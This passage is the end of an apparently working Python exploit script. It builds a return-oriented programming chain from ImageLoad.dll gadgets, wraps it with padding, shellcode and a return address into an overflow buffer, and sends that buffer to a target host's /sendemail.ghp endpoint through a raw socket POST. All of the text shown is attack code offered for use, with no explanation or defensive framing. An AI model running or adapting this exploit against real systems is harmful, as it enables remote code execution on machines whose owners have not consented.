 		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
 		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
 		0x90909090,  # nop
 		0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 rop_chain = create_rop_chain()
 buf = "A"*2278 + rop_chain + shellcode + "B"*(1794-len(shellcode)-len(rop_chain)) + ret
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((sys.argv[1], 80))
 s.send("POST /sendemail.ghp HTTP/1.1\r\n\r\nEmail=" + buf + "&getPassword=Get+Password")
 s.close()